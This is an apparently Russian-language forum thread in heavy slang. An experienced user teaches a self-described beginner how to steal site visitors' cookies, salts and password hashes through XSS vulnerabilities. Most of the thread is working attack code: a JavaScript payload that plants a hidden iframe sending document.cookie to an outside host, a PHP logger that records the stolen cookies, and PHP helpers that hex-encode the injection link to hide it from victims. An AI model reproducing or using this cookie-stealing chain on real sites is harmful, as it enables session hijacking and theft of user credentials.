а, ну удачи



слух, помоги киддису, учусь как добыть соль и хеш... ап стенку хирачусь, найти не могу

как расшифровать-дохуйа, даже прогу нашел, а как добыть-без пон

багдадский вор йа думашеь про? йа непро, й апросто много чего знайу %) йа чуток прерос кидесоф

добывать.. вернусь изтелевизора напишу =)

врянтоф много

вопрос по кешам, ты умеешь куки тянуть? ну хотябы спомощью хсс отак? ну или троеф кидать...

если нет могу обьяснить, дать скрипты и тд, а троеф са м неюзайу, тчонее юзайу но редка ибо поканчио тако ененужна =)



токо пришол с телефвизера, пасарел шутки по стс и мтв там в начале центр рифмы а патом чото ещё вот йа тут)

кстате прям так сразу хэш прогой ты ине расшифруешь =) ибо знайа хэш и юзайа прогу нада буде ищо самому чтото подбирать/щетать/думать в конце можед поулчицо нескольок врянтоф, вот так =)

в нете чаще всго юзаецо мд5.

с помощью SQL и то сам писать не умею, тока на готовых

которых не могу найти



там прога самописная, вводишь соль и хеш и она через мд5 расшифровывает

багдадский вор не всгеда палучицо, нахуй через скулу куки воровать? всё намного проще, плюс очень много внете снифреорв \выставлено но умня мой есть =)для этого нада найти в сайте хсс уязвимость, надневахй азанйу две,точнее знал,попросил натйи мне нашли.. ба сам туда даже недодумался глянуть, патм нужен хсост с пхп хоть беслпатный и прямые руки, и будед тибе хэш исоль%)

сниф на хост залить и через него и соль и хеш прут?

ну и ессно подсунуть кому надо

багдадский вор нуда, кароче в xss уязвимость можно вставить скрипт вбс(встроено в хмтл) типа ктаого <sсriрt> alert('Hacked_by_Goblen') </sсriрt>, или можно сделать перадерсацийу на фаил.. а ищо лучше чтобы незасекли переадерсацийу можно првоести через скрипт который превраит написаное в хекс вид (в 16ричяный вид)

скрипт



inhex.php|или любоеназвание файла которое хочешь галвное тчоб пхп.

<?

$str = urldecode($_SERVER['QUERY_STRING']);

for($i=0;$i<strlen($str);$i++) {

$hex=dechex(ord($str[$i]));

if($str[$i]=='&')

echo "$str[$i]";

else

echo "%$hex";

}

?>

чтобы преаритеь делдаешь

****/inhex.php?исдесь ссыль.

этонада чтобы опытные пользавтели непросекли нужное.

если куки в хексе то можно воспользывацо анхексом

<?

echo urldecode($_SERVER['QUERY_STRING']);

?>



скриптсы по кукам кидать?

давай)

<sсriрt> alert('Hacked_by_Goblen') </sсriрt>

перед ламерками понтоваться?))





****/inhex.php?исдесь ссыль.

эть на сниф я так понел?

багдадский вор нее понтовацо не зачем, хатя можно иггоблен поставить %)

ваще у меня ссылки на xss есть) иногда парицо нерпиходица)

а иногда и приходицо %) на дайрах 2 есть, точнее было, ща кину, доиграйу в фанйла фэнтази 9уйу, первый диск допройду..)

я все равно седня ненадолго

так что когда угодно седня скидывай

багдадский вор на%)

создайом файлег cok.js

йаваскриптынйы файлег)

пишем в него



document.write('<iframe width=1 height=1 style="position: absolute; visibility: hidden;" src="'+'domen.host.ru/cok.php'+'?['+location.host+']:'+document.cookie+'"></iframe>');



где -

http://domen.host.ru/cok.php = сцыль нафйл cok.php

скрипт будед создавать невидимый фрейм, ща дальше)



создаём cok.php



<?

$file = fopen("cookies","a");

fputs($file,"[".date("d.m.y H:i")."]".$QUERY_STRING."\r\n");

fclose($file);

?>



он буде дату и время к кукам крепить





вот так должна выглядить примерно сцыль^

это шифрует в хекс с скрипт <sсriрt src=xss.host.ru/xss.js></sсriрt>;:

http://domen.host.ru/hex.php?<sсript src=domen.host.ru/cok.js></sсriрt>;



нахожишь xss суёшь туда полученный настранице результат, и у тебя в файл cookies на хосте где зарегил и всё залил будед заливацо кукисы, если кукисы в 16 ричномкоду то анхексом, вот.

там будед тебе всё, плюс есть ищ напрае сатйх на перёле сниф, им менне геморно пользоваца но куисытода станут общественной собстенвнностью %) всё й а спать0

спы спокойно, дорогой товарищц, ты умер, но дело твое будет жить))

было б еще время...

багдадский вор ксс не трудна искать прсото вовсе формы пихай ну точто там алерт долгописать есть хацу %) токо пришол.или есть сканеры на ксс активность.. навреное.. слышал гдета)